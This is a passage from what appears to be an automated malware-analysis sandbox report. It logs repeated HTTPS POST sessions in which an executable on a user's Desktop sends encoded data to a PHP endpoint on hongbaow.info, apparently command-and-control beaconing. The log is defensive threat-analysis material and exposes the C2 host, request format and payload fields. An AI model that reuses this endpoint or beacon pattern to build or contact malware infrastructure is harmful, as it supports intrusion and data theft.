                                      server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1590&rtt_var=617&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1836477&cwnd=215&unsent_bytes=0&cid=c3ac5e008b1a7ce5&ts=346&x=0"
                                      2025-01-22 07:43:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.456196104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:26 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:26 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:26 UTC808INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:26 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QwP1ZNfRea3ojRgEIwhyEEERFs56cG0UpD47R8yhsX2ssNmns3r5uxTEHDhX%2B6Wh1CnlgiNhDRNqczZhnAIXxIFMRYJmiu4y9%2BgHoDN7GRLw3hbrQro%2FRimwj9gP04HX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9c00a8642eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1545&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1802469&cwnd=215&unsent_bytes=0&cid=c4a79f87d57cf613&ts=326&x=0"
                                      2025-01-22 07:43:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      45192.168.2.456197104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:27 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:27 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:28 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdV0I5TAarH7dV%2BZ18ANMpg%2BKe6kVzO0jWq2CUd55mtsqjkzpLsBS1yNfoil2JmZ6Os%2BCb98aCADQ6VHVcj5AXrBvUo5RUsnuKwjnh78ZGqJ1e%2F7fk8MWmKiK7eAiwMu"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9c7797143be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1583&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1844598&cwnd=231&unsent_bytes=0&cid=54cc60d2ea035582&ts=314&x=0"
                                      2025-01-22 07:43:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      46192.168.2.456198104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:31 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:31 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:31 UTC819INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:31 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FpC%2FfJTj36AokkCwyP%2B5F2e7TD%2BlT4CxzRT5QOLj42K%2FI%2BqeBFRdfrMJT7yMGw8KU%2Bpm4xKN6KFdLKU8oevCwpZETo9apjILGj2St1MkHk4sfThXMRB%2FmZf%2FLltFwdjJ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9df4eb2c470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1538&min_rtt=1490&rtt_var=593&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1959731&cwnd=219&unsent_bytes=0&cid=2e3741e80e097179&ts=333&x=0"
                                      2025-01-22 07:43:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      47192.168.2.456199104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:32 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:32 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:32 UTC806INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:32 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8O1fKmJEDNKakk7VCiJDtTragoLkQAFES1UxN0qdQk7JLrNHtdxZ7TpmdliCcxBzcbAiq%2BtpE74eoqK%2BrtAYp5hRw2BA2EPHvJjGfjCIW6bOqaECuvOk60aTq873ZwYS"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9e469eaf5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1430&min_rtt=1423&rtt_var=548&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1968981&cwnd=107&unsent_bytes=0&cid=986403383dfcf86b&ts=348&x=0"
                                      2025-01-22 07:43:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      48192.168.2.456200104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:36 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:36 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:36 UTC811INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:36 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pAQdQYVq7ODJ8kKnQR8M12hnbJrAOVJf72j%2B1z91a%2FKLkofI0Q0RGfWR7WPcevUjijTWoq6IVvbFceV4yfuwJiAzmx99x%2BaHukM%2FFpunDpWR5vk6A1a8FRtR%2FYhvQDBr"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de9fabb59f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1436&min_rtt=1431&rtt_var=547&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1982348&cwnd=107&unsent_bytes=0&cid=233779f4fa4d5bb3&ts=311&x=0"
                                      2025-01-22 07:43:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      49192.168.2.456201104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:38 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:38 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:38 UTC806INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:38 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tbpnX45hLRYnTukr7fSh03%2FZ9dyXTgYi16dVynsoDbCyrIDouLJhzlyDFCxFa2S4CpwgUHxrwyaqBEdgkKl3MUDve3ZCgfyMl%2FlDfb5J8E2ar69WsaXEK1MMEJIkpuo"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea095ae28ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1785&rtt_var=677&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1170&delivery_rate=1607929&cwnd=162&unsent_bytes=0&cid=e93a806360b442ed&ts=338&x=0"
                                      2025-01-22 07:43:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      50192.168.2.456202104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:39 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:39 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:40 UTC805INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:40 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dKisHfhUQmUJBo6zAfgG3OQahL6ZMfnNST%2BFT6tYr8DJIkYkYfF4Ib4D9pkykOG0kLLvzEvtk2l6cFr3E1n%2FwatoBf5OkKmSSuPk38FwMu4uTQeNO7lwd86ErbOJBv45"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea125da3f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1489&rtt_var=603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1961047&cwnd=107&unsent_bytes=0&cid=5ea48bc8464f76c7&ts=314&x=0"
                                      2025-01-22 07:43:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      51192.168.2.456203104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:43 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:43 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:43 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:43 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Y%2FshJwyzcANmr2Q18SNZHitwM3bjJe8uQuKqeurQ5CFL0Juc6dKxKq54SIv7D%2Fkkhz%2FCHsjO0OAinp5KzKuIw6g5UaT76pNs2qx%2BlwL4vqoYdHbbEaL8j3fyFibrauH"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea2a3c088ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1743&rtt_var=670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1613259&cwnd=162&unsent_bytes=0&cid=61f0cc2272464dcc&ts=339&x=0"
                                      2025-01-22 07:43:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      52192.168.2.456204104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:44 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:44 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:43:44 UTC810INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:44 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4I5dplssi0Jl8T4WHNZicb7YGViseH8z8UZSSMaxkxq1VyraN6Vn0o%2B8NdqWoeZcA5mktEtUtVZL1ANGNzgq0fHIMS%2FnIemNpGsjw36ujgz6q9aqTiycfYHfbnlI%2F9w%2F"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea2d9e6642eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1584&rtt_var=642&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1843434&cwnd=215&unsent_bytes=0&cid=aeb03387a9ca20b4&ts=324&x=0"
                                      2025-01-22 07:43:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      53192.168.2.456205104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:47 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:43:47 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:43:47 UTC805INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:43:47 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GZFuMvbiSZxClAp1fzZBzskuRI26RbqjT45LaM1E%2FiYC5d11dvjFfa3dvdDX8OAtlC5WuMCXihOBqSi3Xu8zbLRaDgmLEl5RZRVDtjOH%2B4OE8RF2GtsTc46PIGWbcR6X"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905dea420e7e42eb-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1578&rtt_var=626&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1699650&cwnd=215&unsent_bytes=0&cid=0f4d38c405e2a39f&ts=325&x=0"
                                      2025-01-22 07:43:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      54192.168.2.456206104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:43:50 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
